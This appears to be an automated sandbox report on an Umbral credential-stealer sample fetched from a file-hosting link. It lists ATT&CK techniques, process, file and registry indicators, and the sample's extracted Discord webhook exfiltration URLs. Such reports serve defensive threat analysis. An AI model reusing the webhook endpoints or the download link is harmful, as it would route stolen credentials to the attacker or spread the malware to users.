umbral | hxxps://filelu[.]com/gkf7je1dsruo

Analysis

max time kernel
235s
max time network
235s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
20-08-2024 13:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://filelu.com/gkf7je1dsruo

Score

10^/10

umbral credential_access defense_evasion discovery execution persistence privilege_escalation pyinstaller spyware stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1273246180444213339/WD3g0fluQYzUEWJLGktGciLgxDNO7vpGOtwr_MbBkj1p4dQ1E_yVhpKFXenzjoh7wM3K

https://discord.com/api/webhooks/1271643069317644288/Yi3JdjrXJ2C95angH0OndOPpWxWydgLtEZVOUV6s32Pf81SxCWBNaV19zjvPX6j0yW0O

Signatures

Detect Umbral payload 4 IoCs

resource	yara_rule
behavioral1/files/0x000100000002ac5f-797.dat	family_umbral
behavioral1/memory/3916-799-0x000001D066BF0000-0x000001D066C30000-memory.dmp	family_umbral
behavioral1/files/0x000100000002ac5a-885.dat	family_umbral
behavioral1/memory/6112-887-0x000002797BE90000-0x000002797BED0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3248	powershell.exe
1160	powershell.exe
5836	powershell.exe
5256	powershell.exe
5064	powershell.exe
2960	powershell.exe
5384	powershell.exe
1508	powershell.exe
836	powershell.exe
228	powershell.exe
3732	powershell.exe
2140	powershell.exe
892	powershell.exe
2592	powershell.exe
1936	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	updatechecker.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	updatecheckercitron.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	updatecheckercitron.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	updatecheckercitron.exe

Drops startup file 6 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\citronuh.exe	citronuh.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\citronuh.exe	citronuh.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CitronYUH.exe	CitronYUH.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\citronuh.exe	citronuh.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\citronuh.exe	citronuh.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CitronYUH.exe	CitronYUH.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 18 IoCs

pid	Process
1524	7z2408-x64.exe
5384	7zG.exe
3916	updatechecker.exe
6112	updatecheckercitron.exe
3724	citronuh.exe
2644	citronuh.exe
840	CitronYUH.exe
2500	CitronYUH.exe
5860	citronuh.exe
2444	citronuh.exe
5152	updatecheckercitron.exe
1880	citronuh.exe
5396	citronuh.exe
3984	CitronYUH.exe
4332	CitronYUH.exe
2196	citronuh.exe
1952	citronuh.exe
6040	updatecheckercitron.exe

Loads dropped DLL 64 IoCs

pid	Process
3308	Process not Found
3308	Process not Found
5384	7zG.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2644	citronuh.exe
2500	CitronYUH.exe
2500	CitronYUH.exe
2500	CitronYUH.exe
2500	CitronYUH.exe
2500	CitronYUH.exe
2500	CitronYUH.exe
2500	CitronYUH.exe
2500	CitronYUH.exe
2500	CitronYUH.exe
2500	CitronYUH.exe
2500	CitronYUH.exe
2500	CitronYUH.exe
2500	CitronYUH.exe
2500	CitronYUH.exe
2500	CitronYUH.exe
2500	CitronYUH.exe
2500	CitronYUH.exe
2500	CitronYUH.exe
2500	CitronYUH.exe
2500	CitronYUH.exe
2500	CitronYUH.exe
2500	CitronYUH.exe
2500	CitronYUH.exe
2500	CitronYUH.exe
2500	CitronYUH.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops desktop.ini file(s) 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\updatechecker\desktop.ini	7zG.exe
File created	C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\updatechecker\desktop.ini	7zG.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 56 IoCs

Web Service

T1102

flow	ioc
111	discord.com
152	discord.com
175	discord.com
249	discord.com
122	discord.com
146	discord.com
186	discord.com
205	discord.com
227	discord.com
257	discord.com
185	discord.com
229	discord.com
232	discord.com
256	discord.com
143	discord.com
157	discord.com
225	discord.com
259	discord.com
145	discord.com
177	discord.com
182	discord.com
198	discord.com
209	discord.com
213	discord.com
216	discord.com
218	discord.com
219	discord.com
210	discord.com
228	discord.com
253	discord.com
159	discord.com
178	discord.com
180	discord.com
192	discord.com
200	discord.com
251	discord.com
214	discord.com
224	discord.com
230	discord.com
255	discord.com
112	discord.com
184	discord.com
258	discord.com
149	discord.com
199	discord.com
202	discord.com
226	discord.com
119	discord.com
151	discord.com
187	discord.com
153	discord.com
203	discord.com
183	discord.com
196	discord.com
197	discord.com
201	discord.com

Looks up external IP address via web service 12 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
103	ip-api.com
111	ip-api.com
111	api.ipify.org
121	api.ipify.org
127	api.ipify.org
250	api.ipify.org
264	api.ipify.org
122	api.ipify.org
122	ip-api.com
136	api.ipify.org
150	ip-api.com
238	api.ipify.org

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\7-Zip\Lang\ta.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ne.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tr.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\az.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hi.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kaa.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\de.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ku.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\7zCon.sfx	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mng.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spl.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sw.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.chm	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\gu.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mk.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\th.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\readme.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\cy.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ky.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ms.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ca.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\he.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ru.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nl.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\eu.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ga.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lt.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sq.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\va.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\7z.sfx	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\an.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\eo.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nn.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\id.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ka.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\vi.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sa.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\descript.ion	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ar.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fur.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt-br.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spc.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\bg.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\da.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\it.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\io.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ja.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ug.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\br.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fi.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hr.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.dll	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\cs.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\gl.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\License.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\History.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\co.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tk.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mr.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sk.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Uninstall.exe	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\be.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ext.txt	7z2408-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lij.txt	7z2408-x64.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\7z2408-x64.exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000100000002ac57-912.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7z2408-x64.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4148	cmd.exe
4684	PING.EXE

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5548	wmic.exe
4700	wmic.exe
4952	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 21 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}	7z2408-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32	7z2408-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll"	7z2408-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip	7z2408-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2408-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2408-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip	7z2408-x64.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-970747758-134341002-3585657277-1000\{164F0542-3B46-43B5-B83E-FA4E21D4A673}	msedge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension"	7z2408-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32	7z2408-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll"	7z2408-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension"	7z2408-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment"	7z2408-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2408-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment"	7z2408-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2408-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip	7z2408-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip	7z2408-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}	7z2408-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip	7z2408-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2408-x64.exe

NTFS ADS 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 359170.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\7z2408-x64.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\citronToppest.rar:Zone.Identifier	msedge.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
5616	NOTEPAD.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4684	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2936	msedge.exe
2936	msedge.exe
2848	msedge.exe
2848	msedge.exe
4120	identity_helper.exe
4120	identity_helper.exe
2732	msedge.exe
2732	msedge.exe
1056	msedge.exe
1056	msedge.exe
276	msedge.exe
276	msedge.exe
4560	msedge.exe
4560	msedge.exe
3732	msedge.exe
3732	msedge.exe
3732	msedge.exe
3732	msedge.exe
3916	updatechecker.exe
3916	updatechecker.exe
2140	powershell.exe
2140	powershell.exe
2140	powershell.exe
228	powershell.exe
228	powershell.exe
228	powershell.exe
3732	powershell.exe
3732	powershell.exe
3732	powershell.exe
2396	powershell.exe
2396	powershell.exe
2396	powershell.exe
5256	powershell.exe
5256	powershell.exe
5256	powershell.exe
6112	updatecheckercitron.exe
6112	updatecheckercitron.exe
892	powershell.exe
892	powershell.exe
892	powershell.exe
5064	powershell.exe
5064	powershell.exe
5064	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
5968	powershell.exe
5968	powershell.exe
5968	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
5152	updatecheckercitron.exe
5152	updatecheckercitron.exe
2592	powershell.exe
2592	powershell.exe
2592	powershell.exe
5836	powershell.exe
5836	powershell.exe
5836	powershell.exe
5384	powershell.exe
5384	powershell.exe
5384	powershell.exe
4924	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 23 IoCs

pid	Process
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	5384	7zG.exe
Token: 35	5384	7zG.exe
Token: SeSecurityPrivilege	5384	7zG.exe
Token: SeSecurityPrivilege	5384	7zG.exe
Token: SeDebugPrivilege	3916	updatechecker.exe
Token: SeIncreaseQuotaPrivilege	5852	wmic.exe
Token: SeSecurityPrivilege	5852	wmic.exe
Token: SeTakeOwnershipPrivilege	5852	wmic.exe
Token: SeLoadDriverPrivilege	5852	wmic.exe
Token: SeSystemProfilePrivilege	5852	wmic.exe
Token: SeSystemtimePrivilege	5852	wmic.exe
Token: SeProfSingleProcessPrivilege	5852	wmic.exe
Token: SeIncBasePriorityPrivilege	5852	wmic.exe
Token: SeCreatePagefilePrivilege	5852	wmic.exe
Token: SeBackupPrivilege	5852	wmic.exe
Token: SeRestorePrivilege	5852	wmic.exe
Token: SeShutdownPrivilege	5852	wmic.exe
Token: SeDebugPrivilege	5852	wmic.exe
Token: SeSystemEnvironmentPrivilege	5852	wmic.exe
Token: SeRemoteShutdownPrivilege	5852	wmic.exe
Token: SeUndockPrivilege	5852	wmic.exe
Token: SeManageVolumePrivilege	5852	wmic.exe
Token: 33	5852	wmic.exe
Token: 34	5852	wmic.exe
Token: 35	5852	wmic.exe
Token: 36	5852	wmic.exe
Token: SeIncreaseQuotaPrivilege	5852	wmic.exe
Token: SeSecurityPrivilege	5852	wmic.exe
Token: SeTakeOwnershipPrivilege	5852	wmic.exe
Token: SeLoadDriverPrivilege	5852	wmic.exe
Token: SeSystemProfilePrivilege	5852	wmic.exe
Token: SeSystemtimePrivilege	5852	wmic.exe
Token: SeProfSingleProcessPrivilege	5852	wmic.exe
Token: SeIncBasePriorityPrivilege	5852	wmic.exe
Token: SeCreatePagefilePrivilege	5852	wmic.exe
Token: SeBackupPrivilege	5852	wmic.exe
Token: SeRestorePrivilege	5852	wmic.exe
Token: SeShutdownPrivilege	5852	wmic.exe
Token: SeDebugPrivilege	5852	wmic.exe
Token: SeSystemEnvironmentPrivilege	5852	wmic.exe
Token: SeRemoteShutdownPrivilege	5852	wmic.exe
Token: SeUndockPrivilege	5852	wmic.exe
Token: SeManageVolumePrivilege	5852	wmic.exe
Token: 33	5852	wmic.exe
Token: 34	5852	wmic.exe
Token: 35	5852	wmic.exe
Token: 36	5852	wmic.exe
Token: SeDebugPrivilege	2140	powershell.exe
Token: SeDebugPrivilege	228	powershell.exe
Token: SeDebugPrivilege	3732	powershell.exe
Token: SeDebugPrivilege	2396	powershell.exe
Token: SeIncreaseQuotaPrivilege	5136	wmic.exe
Token: SeSecurityPrivilege	5136	wmic.exe
Token: SeTakeOwnershipPrivilege	5136	wmic.exe
Token: SeLoadDriverPrivilege	5136	wmic.exe
Token: SeSystemProfilePrivilege	5136	wmic.exe
Token: SeSystemtimePrivilege	5136	wmic.exe
Token: SeProfSingleProcessPrivilege	5136	wmic.exe
Token: SeIncBasePriorityPrivilege	5136	wmic.exe
Token: SeCreatePagefilePrivilege	5136	wmic.exe
Token: SeBackupPrivilege	5136	wmic.exe
Token: SeRestorePrivilege	5136	wmic.exe
Token: SeShutdownPrivilege	5136	wmic.exe
Token: SeDebugPrivilege	5136	wmic.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe

Suspicious use of SendNotifyMessage 20 IoCs

pid	Process
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1524	7z2408-x64.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2848 wrote to memory of 4836	2848	msedge.exe	81
PID 2848 wrote to memory of 4836	2848	msedge.exe	81
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2032	2848	msedge.exe	82
PID 2848 wrote to memory of 2936	2848	msedge.exe	83
PID 2848 wrote to memory of 2936	2848	msedge.exe	83
PID 2848 wrote to memory of 232	2848	msedge.exe	84
PID 2848 wrote to memory of 232	2848	msedge.exe	84
PID 2848 wrote to memory of 232	2848	msedge.exe	84
PID 2848 wrote to memory of 232	2848	msedge.exe	84
PID 2848 wrote to memory of 232	2848	msedge.exe	84
PID 2848 wrote to memory of 232	2848	msedge.exe	84
PID 2848 wrote to memory of 232	2848	msedge.exe	84
PID 2848 wrote to memory of 232	2848	msedge.exe	84
PID 2848 wrote to memory of 232	2848	msedge.exe	84
PID 2848 wrote to memory of 232	2848	msedge.exe	84
PID 2848 wrote to memory of 232	2848	msedge.exe	84
PID 2848 wrote to memory of 232	2848	msedge.exe	84
PID 2848 wrote to memory of 232	2848	msedge.exe	84
PID 2848 wrote to memory of 232	2848	msedge.exe	84
PID 2848 wrote to memory of 232	2848	msedge.exe	84
PID 2848 wrote to memory of 232	2848	msedge.exe	84
PID 2848 wrote to memory of 232	2848	msedge.exe	84
PID 2848 wrote to memory of 232	2848	msedge.exe	84
PID 2848 wrote to memory of 232	2848	msedge.exe	84
PID 2848 wrote to memory of 232	2848	msedge.exe	84

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1916	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
